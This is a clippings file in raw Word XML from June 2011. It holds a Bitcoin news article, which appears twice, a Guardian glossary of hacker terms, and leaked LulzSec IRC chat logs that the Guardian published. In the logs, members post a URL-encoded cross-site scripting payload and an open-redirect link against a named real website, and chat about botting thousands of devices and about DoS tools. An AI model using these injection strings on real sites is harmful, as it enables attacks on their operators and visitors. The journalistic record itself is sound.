Bitcoins is that they can free people from the tyranny of middlemen: banks; credit-card companies; and money shippers, which charge exorbitant fees for performing a rather simple task.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a lot of people the appeal lies in the chance to get rich quick by getting in early on the next Internet craze. Still, investing in Bitcoins is extremely risky. You don't know who's running the exchanges, and you can't be sure these guys won't just take your money and run.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Adding to the risk, authorities might take action. But even if Bitcoin goes away, others like it will spring up. "Now that we have the technology to create decentralised currencies," Norman says, "they are definitely here to stay."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Newsweek</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Khaleej Times 2011.06.26 09:26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.khaleejtimes.com/DisplayArticle08.asp?xfile=data/opinion/2011/June/opinion_June128.xml§ion=opinion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The webs secret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Lyons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June 2011, 7:06 PM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if people could use the Internet to create a new kind of money, one that didnt involve governments and central banks and could be used anonymously, like cash? That is the idea behind Bitcoin, a virtual currency that has caught the attention of computer geeks, financial speculators, and drug dealers. For the first time, you can buy anything online without giving your credit-card number or bank-account information leaving no trace at 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Hundreds of merchants accept Bitcoins for things like books, computers, and professional services. The currency trades on a handful of Bitcoin exchanges, where the price of a Bitcoin fluctuates based on demand. Not long ago a single Bitcoin sold for less than a dollar, but in recent months the price climbed to $8, then to $20, then above $30, before falling back to $18, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>current level.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What exactly are you buying? A Bitcoin is basically just a little bit of encrypted code that can be zipped over the Internet and stored in a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>digital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concept was proposed by a mysterious hacker named Satoshi Nakamoto (no one knows who he is, and the name is believed to be a pseudonym), who published a white paper describing a way in which computers connected over the Internet could be used to create an unregulated "crypto-currency." New York Senator Charles Schumer recently called Bitcoin "an online form of money laundering," after learning about an online warehouse called Silk Road where sellers advertise an astounding array of illegal wares - marijuana, hashish, LSD, ecstasy, cocaine, heroin - and where the only currency accepted is the Bitcoin. (Silk Road is currently shut down, though its anonymous manager claims he intends to start back up soon.)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there are about 6.5 million Bitcoins in circulation. The money supply is controlled by software algorithms and the total supply will max out at 21 million coins. You can crank out Bitcoins on a PC, but it's an incredibly computer-intensive task, and it will keep getting harder as the number of Bitcoins in existence increases. Some people have pooled together hundreds of machines to "mine" Bitcoins. Most folks, however, just buy them on an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already are hoarding Bitcoins, expecting a Bitcoin bubble will drive the value up to hundreds, maybe even thousands of dollars per coin. The biggest holder, whose identity is not known, is sitting on about 300,000 coins, currently worth about $6 million, says Donald Norman, who runs the London-based Bitcoin Consultancy, which advises companies that want to get in on the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Norman says the power of Bitcoins is that they can free people from the tyranny of middlemen: banks; credit-card companies; and money shippers, which charge exorbitant fees for performing a rather simple task.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a lot of people the appeal lies in the chance to get rich quick by getting in early on the next Internet craze. Still, investing in Bitcoins is extremely risky. You don't know who's running the exchanges, and you can't be sure these guys won't just take your money and run.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Adding to the risk, authorities might take action. But even if Bitcoin goes away, others like it will spring up. "Now that we have the technology to create decentralised currencies," Norman says, "they are definitely here to stay."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Newsweek</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Khaleej Times 2011.06.25 22:26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.khaleejtimes.com/DisplayArticleNew.asp?xfile=/data/opinion/2011/June/opinion_June128.xml§ion=opinion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Hacker's glossary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Guide to the world of dox, bots and VPNs Tweet this reddit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guardian.co.uk, Friday 24 June 2011 21.34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"Giggles" or "laughs", with the flavour of schadenfreude.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Documentation relating to the real-life identity of a hacker. A cause of huge paranoia for senior aficionados whose activity relies on remaining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of infected computers to remotely attack other websites. Botnets change hands for cash in the internet's criminal underworld. Ryan Cleary, the Essex teenager in custody over LulzSec-related attacks, is charged with distributing a botnet.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DDoS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distributed denial of service (DDoS) attack, a network of computers (often a botnet) bombards a website with simultaneous requests to load, making it inaccessible for others. You don't need thousands of people: groups such as LulzSec are composed of a handful of people with access to botnets.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IRC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Relay Chats are forums, public or private, for hackers and IT specialists. Taking part in the chats requires some tech expertise Б─" the easiest way is through a downloaded client, which bars entry to police and journalists.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VPN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Virtual Private Network, or VPN, is an anonymous internet connection, making it difficult to trace your real-life location. Used to prevent government spying (and in China to evade the "great firewall"), VPNs encrypt information the user sends over the internet.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world's newest currency. Bitcoins are an untraceable, cryptographically created, online currency that can be exchanged for real-life currency in certain online locations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Guardian Unlimited 2011.06.25 02:23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.guardian.co.uk/technology/2011/jun/24/hackers-glossary-dox-bots-vpns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IRC leak: the full record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text of the chatroom logs of discussions between the hackers involved in LulzSec, aka Lulz Security, reveal the tensions inside the group Tweet this reddit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Arthur and Ryan Gallagher guardian.co.uk, Friday 24 June 2011 14.17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11:09:12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ENDING LOGGING AT Tue May 31 11:09:55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11:09:55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11:12:06 [redacted] http://www.billoreilly.com/pg/jsp/help/contactus.jsp?cid=1308195%3C%22%27;alert%28String.fromCharCode%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2888,83,83%29%29//\%27;alert%28String.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>fromCharCode%2888,83,83%29%29//%22; alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83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%29%29//--%3E%3C/SCRIPT% 3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%22%3E&amp;tid=401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11:12:37 [redacted] delivered :D May 31 11:18:50 * Neuron (Neuron@HA-dvk.col.tt2aeb.IP) has joined #pure- elite May 31 11:18:57 Neuron o/ morning!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>May 31 11:19:30 [redacted] hello May 31 11:19:38 [redacted] XSS in billoreilly lol May 31 11:19:42 [redacted] http://www.billoreilly.com/pg/jsp/help/contactus.jsp?cid=1308195%3C%22%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;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alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29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//\%22;alert%28String.fromCharCode%2888,83,83%29%29//-- %3E%3C/SCRIPT%3E%22%3E%27 %3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%22%3E&amp;tid=401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11:19:50 [redacted] also a URL redirection May 31 11:19:51 [redacted] http://www.billoreilly.com/site/rd?satype=1&amp;said=313&amp;pos=11&amp;url=http://www.meatspin.com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11:20:31 Neuron lmfao May 31 11:20:39 Neuron wow you been bizzy May 31 11:21:54 Neuron what made you go after billoreilly?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>May 31 11:22:59 joepie92 hai Neuron May 31 11:23:02 Neuron o/ May 31 11:23:54 [redacted] the lulz May 31 11:45:15 * Neuron yawns May 31 11:50:06 Avunit Get on the new IRCd; use your login @ http://46.243.12.9/docs/ to check how to!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>May 31 11:51:18 * Neuron rages my login info is on my other machine :( Avunit help a man out?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>May 31 11:51:28 Avunit lol May 31 11:51:31 Avunit ill reset your pass May 31 11:51:35 Avunit sinc ei cant obviously read it May 31 11:51:45 Neuron rgr thanks May 31 11:51:50 [redacted] Avunit May 31 11:51:54 Avunit yesh May 31 11:51:59 [redacted] nvm i still ahve my pass :D May 31 11:52:19 * Avunit has quit (SSL Connection closed) May 31 11:52:40 * Avunit (Avunit@HA-4o8.6s8.srgpum.IP) has joined #pure- elite May 31 11:52:48 Avunit what is this for sorcery D: May 31 11:52:55 Neuron XD May 31 11:53:04 * Avunit has quit (Changing host) May 31 11:53:04 * Avunit (Avunit@netadmin.operationfreedom.ru) has joined #pure-elite May 31 11:53:30 Avunit Anyway need to move asap, i only havent spoken to devrandom yet May 31 11:53:44 Neuron Avunit: cap_sasl.pl 404 May 31 11:53:59 Avunit wut May 31 11:53:59 Avunit sec May 31 11:55:55 Avunit oh i know xD May 31 11:56:48 [redacted] brb May 31 11:56:54 Python interface unloaded * * ** ENDING LOGGING AT Tue May 31 11:56:54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11:58:25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11:58:25 * Now talking on #pure-elite May 31 11:58:25 * Topic for #pure-elite is: [pE] security research and development. | PRIV8!PRIV8!PRIV8! No leaks, no vanity. Everything stays here. | work with trollpoll on .es targets. MSG him for infos. google search site:gob.es for fun May 31 11:58:25 * Topic for #pure-elite set by Sabu!sabu@netadmin.operationfreedom.ru at Wed May 25 16:25:57 2011 May 31 11:59:09 Neuron Avunit: :( don't like us irssi guys ;( May 31 11:59:14 Avunit LOL May 31 11:59:16 Avunit sowwie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12:00:54 Avunit fixd gimme a sec May 31 12:01:47 Neuron rgr May 31 12:02:16 Avunit there you go May 31 12:03:17 Avunit lighttpd thought you wanted to execute a .pl script May 31 12:03:22 Avunit and was like OH NO YOU DIDNT May 31 12:03:45 Neuron XD May 31 12:04:24 Avunit so chagned it to .txt :P just save and rename it to cap_sasl.pl May 31 12:05:50 Neuron brb May 31 12:05:53 * Neuron has quit (Quit: leaving) May 31 12:06:32 * Avunit has changed the topic to: Get on the new IRCd; use your login @ http://46.243.12.9/docs/ to check how to!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>May 31 12:07:01 * Avunit has changed the topic to: Get on the new IRCd; use your login @ http://46.243.12.9/docs/ to check how to! /join #pure-elite on the new IRCd!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>May 31 12:08:09 * Neuron (Neuron@HA-dvk.col.tt2aeb.IP) has joined #pure- elite May 31 12:08:18 Neuron irss = /sasl command not find May 31 12:08:52 Avunit eek May 31 12:09:00 Avunit did you load the script?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>May 31 12:09:18 Neuron let me try again May 31 12:09:23 * Neuron has quit (Quit: leaving) May 31 12:26:36 * Neuron_ (Neuron@HA-dvk.col.tt2aeb.IP) has joined #pure- elite May 31 12:26:42 &lt;neuron_&gt; Avunit: your script hates backtrack :P May 31 12:26:56 Avunit not miens D: May 31 12:27:02 * Topiary has quit (Quit: restarting client) May 31 12:27:47 &lt;neuron_&gt; brb thrid try May 31 12:27:54 * Neuron_ has quit (Quit: leaving) May 31 12:28:04 * Topiary (t@HA-581.fpm.h7vc0g.IP) has joined #pure-elite May 31 12:50:18 * Neuron (Neuron@HA-dvk.col.tt2aeb.IP) has joined #pure- elite May 31 12:50:22 Neuron ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>May 31 12:50:26 Avunit neuron May 31 12:50:29 Neuron giving me connection refused May 31 12:50:31 Avunit http://pthree.org/2010/01/31/freenode-ssl-and-sasl- authentication-with-irssi/ May 31 12:50:41 Avunit that means you didnt use the right port or didnt SASL auth May 31 12:51:04 Neuron rgr May 31 12:52:17 Topiary 9001 or 9002 May 31 12:52:29 Avunit 1 = ssl, 2 = NO SSL BIATCH May 31 12:53:10 * Neuron has quit (Quit: leaving)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13:03:05 * Neuron (Neuron@HA-dvk.col.tt2aeb.IP) has joined #pure- elite May 31 13:03:26 Neuron Avunit: lol really quick which password the one you just gave me or the oone for nickserv here.. both hate me equally May 31 13:03:30 Neuron :) May 31 13:03:41 Avunit the one ig ave you May 31 13:03:51 Neuron capital N on Neuron or lowercase/ May 31 13:03:54 Avunit capital May 31 13:04:41 Neuron back to fighting with it :) May 31 13:07:43 Neuron im sure its because im doing something stupid May 31 13:07:46 * Neuron has quit (Quit: leaving) May 31 13:15:00 * Neuron (Neuron@HA-dvk.col.tt2aeb.IP) has joined #pure- elite May 31 13:15:30 Neuron Avunit: wanna know what the problem was XD i was naming my network PE in my config....</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>May 31 13:15:53 Topiary happened to me first time May 31 13:16:03 Topiary I auth'd to shipyard but named my net freedomsasl May 31 13:21:27 Neuron ok was hoping iw asn't the only one :E May 31 15:00:16 storm yo May 31 15:17:39 * Disconnected (Remote host closed socket).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>* * ** ENDING LOGGING AT Tue May 31 15:17:39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23:51:53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23:51:53 * Now talking on #pure-elite May 31 23:51:53 * Topic for #pure-elite is: PRIV8. NO LEAKS. RESPECT EACH OTHER. RESEARCH AND EXPLOIT DEV!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>May 31 23:51:53 * Topic for #pure-elite set by Sabu!sabu@netadmin.operationfreedom.ru at Tue May 31 18:48:23 2011 May 31 23:52:05 Neuron o/ hey [redacted] May 31 23:52:09 [redacted] hello May 31 23:52:11 [redacted] did i miss anything?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>May 31 23:52:16 Neuron nothing really May 31 23:52:21 [redacted] lot of news coverage May 31 23:52:32 Neuron just me and kayla trying to bot 38k or so busybox's you? May 31 23:53:44 [redacted] XD May 31 23:53:46 [redacted] nothing at all May 31 23:53:49 [redacted] that sounds nice May 31 23:54:18 Neuron the most i can do is make a bash script that acts has a irc client and we can issue commands that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01:04:47 * value has quit (Connection closed) Jun 01 01:19:35 * value (value@HA-ao3.bsr.r1bp4m.IP) has joined #pure-elite Jun 01 01:28:38 * Topiary (t@HA-r9b.fpm.h7vc0g.IP) has joined #pure-elite Jun 01 01:29:53 * Neuron has quit (Ping timeout: 121 seconds) Jun 01 01:32:26 * Neuron (Neuron@HA-l0q.345.a84vd3.IP) has joined #pure- elite Jun 01 01:39:34 Recursion http://i.imgur.com/DsgWI.jpg Jun 01 01:40:10 Topiary Ooh that's a much better screencap Jun 01 01:40:14 Topiary the one I had earlier was lame Jun 01 01:40:18 Topiary oh man it includes the twitter Jun 01 01:40:29 Topiary fucking Wall Street Journal printed a twitter name Jun 01 01:40:32 Topiary and a fucking cat in space Jun 01 01:40:40 Neuron XD Jun 01 01:41:12 Neuron thats epic Jun 01 01:56:12 joepie92 http://www.nasa.gov/multimedia/nasatv/index.html Jun 01 01:56:29 joepie92 supposedly a shuttle is going to land Jun 01 01:56:31 joepie92 or some shit Jun 01 01:57:07 storm hi Jun 01 01:57:41 Neuron lol Jun 01 01:57:43 Neuron watching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02:13:02 * Topiary has quit (Ping timeout: 121 seconds) Jun 01 02:14:08 * Topiary (t@HA-cin.fpm.h7vc0g.IP) has joined #pure-elite Jun 01 02:18:29 Topiary anything exciting on Nasa?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 02:19:02 storm hi Topiary Jun 01 02:19:06 Topiary hey storm Jun 01 02:19:20 storm sup Jun 01 02:19:45 Topiary just woke up, anything exciting happening with you? Jun 01 02:19:53 storm yeah i just ate bbq Jun 01 02:19:54 storm :D Jun 01 02:20:10 storm and i just woke up as well Jun 01 02:20:26 * Neuron has quit (Quit: leaving) Jun 01 02:20:38 Topiary BBQ for breakfast, mmm Jun 01 02:22:06 storm yessir Jun 01 02:22:14 storm especially at 222am Jun 01 02:22:17 storm xD Jun 01 02:23:42 * lol (lol@HA-r3c.ts4.h3kc47.IP) has joined #pure-elite Jun 01 02:23:48 lol hey guys :) Jun 01 02:25:16 Topiary hi kayla Jun 01 02:25:30 storm ah Jun 01 02:25:32 storm so lol is kayla Jun 01 02:25:35 storm makes sense Jun 01 02:25:36 storm ;x Jun 01 02:26:01 lol :D Jun 01 02:26:03 storm i should have known with all those faces Jun 01 02:26:27 lol lmao Jun 01 02:26:30 lol how goes :D?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 02:26:34 storm lols Jun 01 02:26:36 storm fine Jun 01 02:26:46 storm still looking for an rfi/lfi bot :p Jun 01 02:28:30 lol i've got one lol :D with google bypass, if the bypass still works xD Jun 01 02:28:52 lol but it's on a USB but i think the USB might be infected xD Jun 01 02:29:04 lol so im scared to plug it in xD Jun 01 02:31:02 * Topiary has quit (Ping timeout: 121 seconds) Jun 01 02:31:49 storm lol Jun 01 02:31:57 storm get off windows and nothing is ever infected! Jun 01 02:33:55 joepie92 it r landing nao Jun 01 02:33:56 joepie92 I believe Jun 01 02:34:02 joepie92 http://www.ustream.tv/nasahdtv Jun 01 02:34:04 joepie92 :P Jun 01 02:34:30 joepie92 also, storm, kayla is rather recognizable :P Jun 01 02:36:39 storm orly?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 02:36:49 joepie92 yarly Jun 01 02:37:06 joepie92 I recall one line from lol being quoted Jun 01 02:37:12 joepie92 and I was liek ohey dats kayla Jun 01 02:37:13 joepie92 lol Jun 01 02:38:21 joepie92 also Jun 01 02:38:27 joepie92 landed spaceshuttle has landed Jun 01 02:38:28 joepie92 :P Jun 01 02:38:31 * Topiary (t@HA-tic.fpm.h7vc0g.IP) has joined #pure-elite Jun 01 02:38:50 Topiary hey storm, did you shit on 2600 again earlier? Jun 01 02:39:26 lol apparnently they want more :o Jun 01 02:39:27 lol :D Jun 01 02:39:36 Topiary more you say Jun 01 02:43:12 lol moooooooooooooooooooooooooooooooooooooooooooore Jun 01 02:43:23 Topiary my connection is being a dick Jun 01 02:43:26 Topiary I think it's the weather Jun 01 02:43:48 storm yesh Jun 01 02:43:50 storm i did Jun 01 02:43:53 storm wy?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 02:43:55 storm why?* Jun 01 02:44:14 storm i brought madjack down to like 17 users or something Jun 01 02:44:25 lol lol Jun 01 02:44:34 storm as well as collective Jun 01 02:44:39 storm ;P Jun 01 02:45:05 Topiary heh they mad Jun 01 02:45:56 storm howso Jun 01 02:46:13 Topiary well Overlord Mighty Jester himself was tweeting at us Jun 01 02:46:16 Topiary calling us failures :( Jun 01 02:46:28 lol lol Jun 01 02:47:10 storm lmfao Jun 01 02:47:13 storm where Jun 01 02:47:16 storm link a nig Jun 01 02:48:00 lol https://twitter.com/#!/th3j35t3r Jun 01 02:48:04 Topiary Jun 01 02:48:05 lol tht is t35t3r Jun 01 02:48:18 lol tbh he needs owning :D Jun 01 02:48:26 Topiary he's needed owning for a long time indeed Jun 01 02:48:38 Topiary you gotta love it though Jun 01 02:48:49 Topiary his little fortress with his minions, his DoS tool and his blog Jun 01 02:48:54 Topiary his world must be so small Jun 01 02:49:03 storm @anonakomis, @lulzsec, whatever, whoever. I AM BUSY. So how bout ya fuck off? Show some grace at least. R WE DONE YET?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 02:49:04 storm rofl Jun 01 02:49:20 Topiary storm: this is the dude that claims to have DDoS'd WikiLeaks Jun 01 02:49:30 storm nice Jun 01 02:49:38 Topiary speaking of, did you guys know WikiLeaks tweeted our PBS Tupac story?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 02:49:46 storm yes Jun 01 02:49:48 storm i was around Jun 01 02:49:49 storm :) Jun 01 02:51:03 storm this guy has a lot of crying posts Jun 01 02:52:33 Topiary aye he's a barrel of joy Jun 01 02:52:56 storm awinee Awinee Jun 01 02:52:56 storm @ Jun 01 02:52:56 storm @maxxmac1 @LulzSec my loic broke so i stopped for the night. Happy playing Jun 01 02:53:15 storm is that the windows dos tool he showed to cameras? Jun 01 02:53:36 Topiary that was HOIC, he fired it at his own government from his home IP Jun 01 02:53:41 Topiary to "test" it Jun 01 02:53:49 storm lmfao Jun 01 02:53:58 storm terrible Jun 01 02:54:03 Topiary Jester's DoS tool = Apache 0day + slowloris + Tor Jun 01 02:54:17 storm my dos tool is over ten years old and at least it spoofs Jun 01 02:54:28 storm ;p Jun 01 02:54:36 Topiary naturally you are a sexy beast Jun 01 02:54:41 storm :D Jun 01 02:55:55 Topiary tl;dr on awinee - he's insanely lonely/ugly so even treats our mockery as a sign of attention Jun 01 02:56:09 storm hahaha Jun 01 02:56:16 Topiary tl;dr on Jester - pompous elitism-fueling blogger with Tor Jun 01 02:56:21 Topiary tl;dr on the rest of them - sheep Jun 01 02:56:58 storm i use tor to ssh out ;d does theeze make me leet? Jun 01 02:57:16 Topiary yes it does Jun 01 02:57:37 lol no it makes you a ver patient person :O Jun 01 02:57:46 lol SSH over TOR is looooooooooooooooooow xD Jun 01 02:57:52 lol very* Jun 01 02:58:00 storm rofl Jun 01 02:58:00 storm dude Jun 01 02:58:02 storm i agree Jun 01 02:58:06 storm tor is slow as balls Jun 01 02:58:10 storm btw Jun 01 02:58:12 storm FailSec?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 02:58:15 storm wtf is this shit Jun 01 02:58:21 Topiary storm, we've had stalkers like that for months Jun 01 02:58:24 Topiary they follow us everywhere we go Jun 01 02:58:27 Topiary they monitor everything we do Jun 01 02:58:31 Topiary they make parodies of all our accounts Jun 01 02:58:33 Topiary we're kind of like a rock band Jun 01 02:58:36 Topiary as someone put it Jun 01 02:58:53 storm lmfao Jun 01 02:59:27 lol it's got tht bad attentions seeking Adrian lamo wen't and reg'd lulzsec.com proberbly so onw day somone whois it out of curiosity and sees his name so he can get a mention lol Jun 01 02:59:41 lol even on his site, he had links to google searches of himself Jun 01 02:59:46 Topiary guys did you see Adrien tweeted us insulting shit? Jun 01 02:59:54 storm well Jun 01 02:59:58 storm i can get you guys Jun 01 02:59:58 lol i dont think he's ever hacked anything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03:00:02 storm lulsec.lulz.net Jun 01 03:00:10 storm or sec.lulz.net Jun 01 03:00:11 storm or whatever Jun 01 03:00:22 Topiary we're working on a website at the moment Jun 01 03:00:28 Topiary 'sides we already has haz.lulz.net Jun 01 03:00:41 Topiary I will show you the design for the site so far Jun 01 03:00:46 storm you have access to lulz.net?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
